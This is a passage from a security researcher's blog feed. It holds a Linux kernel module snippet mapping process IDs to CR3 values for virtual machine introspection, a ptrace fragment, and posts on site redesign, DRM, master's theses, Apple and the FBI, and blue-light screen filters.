<span class="w"> </span><span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_DETACH</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"> </span><span class="c1">// Resume child</span>
<span class="p">}</span>
</code></pre></div>
<p>Note that this code detaches the parent from the child once the child has been
paused. This causes the child to resume normal execution. If we wanted to
continue monitoring the child (for example, to detect <code>fork()</code> or <code>clone()</code>), we
could do so.</p>
<p>Making the above modification allows the parent to capture the correct CR3 value
and get a complete PT trace.</p>Of Fancy Bears and Men: Attribution in Cybersecurity2017-03-09T22:30:00-05:002017-03-09T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-03-09:/of-fancy-bears-and-men.html<p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p>Getting the CR3 value for a PID in Linux2017-01-30T20:30:00-05:002017-01-30T20:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-30:/pid-to-cr3.html<p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000 page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot …</p><p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000 page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot of x86 specific programming and virtual machine introspection (VMI).
To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding
value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture,
I recommend reading <a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">this page</a> on Linux x86 page table management.
The short story is when a process is executed on an x86 CPU, the CR3 register is loaded with the <em>physical</em> address of that process's
<em>page global directory</em> (PGD).
This is necessary so the CPU can perform translations from virtual memory address to physical memory addresses.
Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system.
This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is
being executed. Instead, we can just monitor writes to the CR3 register.</p>
<p>However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing.
This is commonly referred to as the <em>semantic gap</em> problem. In order to cross this gap, we need to map the PID values of the processes we're interested
in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/module.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/kernel.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/sched.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><linux/pid.h></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><asm/io.h></span>
<span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">task_struct</span><span class="w"> </span><span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">mm_struct</span><span class="w"> </span><span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">cr3_phys</span><span class="p">;</span>
<span class="w"> </span><span class="n">task</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span><span class="w"> </span><span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">task</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="c1">// pid has no task_struct</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">mm</span><span class="p">;</span>
<span class="w"> </span><span class="c1">// mm can be NULL in some rare cases (e.g. kthreads)</span>
<span class="w"> </span><span class="c1">// when this happens, we should check active_mm</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">mm</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">task</span><span class="o">-></span><span class="n">active_mm</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">mm</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="c1">// this shouldn't happen, but just in case</span>
<span class="w"> </span><span class="n">cr3_virt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="w"> </span><span class="n">mm</span><span class="o">-></span><span class="n">pgd</span><span class="p">;</span>
<span class="w"> </span><span class="n">cr3_phys</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">cr3_phys</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>It should be noted that while the CR3 register is useful for tracking which <em>process</em> is being executed, it cannot track which <em>thread</em> is executing
because threads share memory and therefore will have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is
a more complicated task and is a topic for another time.</p>
<p>For simplicity I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection
on an unmodified kernel, you should checkout <a href="https://github.com/libvmi/libvmi/blob/master/libvmi/os/linux/memory.c#L145">libVMI's code</a>.</p>Site Redesign2017-01-24T19:20:00-05:002017-01-24T19:20:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-24:/move-to-pelican.html<h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career; an eye catch for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not …</p><h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career; an eye catch for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not be restricted by the cookie-cutter molds set by
social networking sites. A few months later I was asked to write blog articles for Syracuse University's engineering college and suddenly my website was no longer a sole
page. As much as I liked my <a href="https://html5up.net/">HTML5Up</a> design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at
times.</p>
<h2>AMP HTML</h2>
<p>I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main
reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional
was for a site with my name on it to get compromised because I only look at it twice a year.</p>
<p>I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called <a href="https://www.ampproject.org/learn/about-amp/">AMP HTML</a>.
What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP
HTML pages and even social networks like <a href="https://www.ampproject.org/learn/about-amp/">Twitter</a> announced plans to implement AMP HTML caching servers. All this meant free
bandwidth and geographically distributed caching for my humble site. Perfect.</p>
<p>Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on
<a href="https://material.io/guidelines/material-design/introduction.html">Material Design</a>), I realized my decision was not the best. More accurately, my work in security brought
me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the
company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its
true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:</p>
<blockquote>
<p>If you're not paying for it; you're the product.</p>
</blockquote>
<p>There were also three other reasons for my dissatisfaction with AMP HTML:</p>
<h3>Mandatory JavaScript</h3>
<p>As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.).
If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very
rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious
for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just
met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more
true when that JavaScript is heavily compressed and obfuscated.</p>
<h3>In-line CSS</h3>
<p>In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple
web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that lead to inconsistent formatting and unnecessary
work.</p>
<h3>Public Opinion</h3>
<p>People, especially those with technical background, are becoming more conscious of the importance of privacy and security and more weary of the power wielded by major tech
companies. Even the tech enthusiasts that buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is
<a href="https://tech.slashdot.org/story/17/01/18/1455259/the-problem-with-google-amp">negativity towards the AMP HTML platform</a>.</p>
<p>Additionally, as the AMP HTML specification evolves, people both on the <a href="https://stackoverflow.com/questions/41823700/amp-cache-not-getting-removed">technical</a> and
<a href="http://searchengineland.com/google-amp-display-publishers-urls-265945">nontechnical</a> sides are becoming confused.</p>
<p>In response to all these points, I decided it was time to move to a different platform for managing my website.</p>
<h2>Pelican</h2>
<p>For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted a way to be able to write my content in a high level
language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After
looking at what the blogs I read were using and hearing a few recommendations, I decided to go with <a href="https://blog.getpelican.com/">Pelican</a>. For those of you who want to
statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines.
Pages and articles can be written in <a href="https://en.wikipedia.org/wiki/Markdown">Markdown</a>, which should be familiar to anyone who stores code in git repositories.
There are also plenty of free and publicly available <a href="http://www.pelicanthemes.com/">themes</a>, including the one I'm using for the site
<a href="https://github.com/nairobilug/pelican-alchemy/">right now</a>. I'll stop there before I start to sound like a salesman.</p>
<p>However, while I'm on the topic of plugging software I like, I will also give a quick mention to <a href="https://wummel.github.io/linkchecker/">linkchecker</a>, which I used to find
and fix a few links in my past articles to external sites that no longer exist.</p>
<p>So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.</p>The Problem with DRM2016-10-22T22:30:00-04:002016-10-22T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-10-22:/drm-problem.html<h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open …</p><h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researchers, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else I hope to present a robust formulation of the problem that is insightful while still being easy to understand.</p>
<p>Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.</p>
<h2>Motivation</h2>
<p>DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content; such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on-demand, DRM touches more lives now than ever before.</p>
<p>For users of these services the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago however and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require <a href="https://news.slashdot.org/story/16/10/12/2011240/netflix-now-only-has-31-movies-from-imdbs-top-250-list">money saving cuts</a>. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.</p>
<p>The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM; systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.</p>
<p>However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.</p>
<h2>Cat and Mouse</h2>
<p>The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.</p>
<p>However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors. Namely, the cost of implementing the DRM and the inconvenience the DRM presents the benign user verses the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.</p>
<p>So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using her own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.</p>
<p>Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard is it to find this optimal balance. If it's easy we can just find it and we're done. We'd then know what degree of DRM to implement.</p>
<p>Sadly, I'm going to argue that it's not easy to find. In fact, the reason why finding it is difficult is because it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure we might get lucky, but why pay to play in the first place?</p>
<h2>Two Extra Cents</h2>
<p>In general I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering if a solution has fallen into this pattern because the result when it does is a lot of effort spent on something that doesn't actually solve the intended problem.</p>Demystifying the Master’s Thesis — Is it right for you?2016-04-21T22:30:00-04:002016-04-21T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-21:/demystifying-the-masters-thesis.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.</p>
<p>Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?</p>
<p>Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”</p>
<p>Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.</p>
<p>Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.</p>
<p>Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.</p>
<p>So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write for great lengths about the difference between being an engineer and being a researcher, but suffice to say, the open-endedness makes researching a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.</p>
<p>As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctorate student at Georgia Tech—a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple’s Balancing Act—Yesterday, Today, and Tomorrow2016-04-01T22:30:00-04:002016-04-01T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-04-01:/apple-yesterday-today-tomorrow.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster …</p></blockquote><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>A few months ago I read <a href="http://www.orbooks.com/catalog/splinternet-by-scott-malcomson/">Splinternet</a> by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:</p>
<blockquote>
<p>"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."</p>
</blockquote>
<p>This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.</p>
<p>First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.</p>
<p>Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake that what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.</p>
<p>All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Apple vs. the FBI2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/apple-vs-fbi.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on one of the shooters’ iPhone, only to be thwarted by the discovery that the device was encrypted and password protected. Ten wrong guesses and the device will wipe itself clean including all the precious data within.</p>
<p>In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.</p>
<p>In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing for such a power to exist would create a precedent which would undermine their customer’s trust in all of Apple’s products. And this distrust could radiate outwards to other tech companies like Google and Microsoft who could likewise do the same.</p>
<p>But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.</p>
<p>The root of this problem is not one we are unfamiliar with. Time and time again we are presented with the question of the benefits of taking something away from everyone in order to prevent a few from abusing it. The answer is dependent on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.</p>SU Senior Carter Yagemann’s Summer of Android2016-02-22T22:30:00-05:002016-02-22T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-22:/summer-of-android.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>This summer, Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect user’s information on smartphones and tablets. We caught up with him following his final presentation of his research to a room of faculty and students at Syracuse University.</p>
<p><strong>How did you learn about the REU program?</strong></p>
<p>I was actually a student in one of Professor Du‘s classes and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.</p>
<p><strong>What has this experience been like?</strong></p>
<p>It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.</p>
<p>One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.</p>
<p>Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.</p>
<p><strong>Why did you choose to come to Syracuse University?</strong></p>
<p>I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.</p>
<p><strong>What else are you involved in at SU?</strong></p>
<p>I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.</p>
<p><strong>What do you plan to do with your degree in Computer Science after you graduate?</strong></p>
<p>I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.</p>
<p>I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.</p>
<p>I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.</p>
<h2>About the Electrical Engineering and Computer Science REU</h2>
<p>The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities, including SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champlain, completed research on a range of topics. The predominant theme was the development and security of the Android operating system.</p>
<p>Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.</p>
<p>“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” describes Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.</p>
<p>Kevin Du, Professor of Computer Science, advised the students that focused on Android devices including:</p>
<ul>
<li><strong>Gabrielle George</strong>, “A Drinking the From the Fire Hydrant Approach to Learning Computer Science”</li>
<li><strong>Jonathan Secora</strong>, “Animation and Application in Android”</li>
<li><strong>Curtis Robinson</strong>, “A Short Survey of Android”</li>
<li><strong>Jason Davison</strong>, “Communication Problems with the Android System”</li>
<li><strong>Carter Yagemann</strong>, “Intent Firewall – Android Security via Intent Filtering”</li>
<li><strong>Fred Schlereth</strong>, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined, “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”</li>
</ul>
<p>Current Computer Science Ph. D student, Paul Rattazi, advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”</p>How Orange Helps You Sleep At Night2016-02-04T22:30:00-05:002016-02-04T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2016-02-04:/how-orange-helps-you-sleep-at-night.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise and one theory gaining …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? <a href="http://www.pnas.org/content/112/4/1232.full.pdf">Research conducted in recent years</a> has shown that sleep problems are on the rise and one theory gaining momentum points to our electronics as the cause. Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult. So what can we do about it? We could restrict ourselves from staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise—promising a better night’s sleep for those of us that are unable (or unwilling) to give up our screens at night, This software is already publicly available for computers thanks to groups like <a href="https://justgetflux.com/">f.lux</a>, but availability on mobile 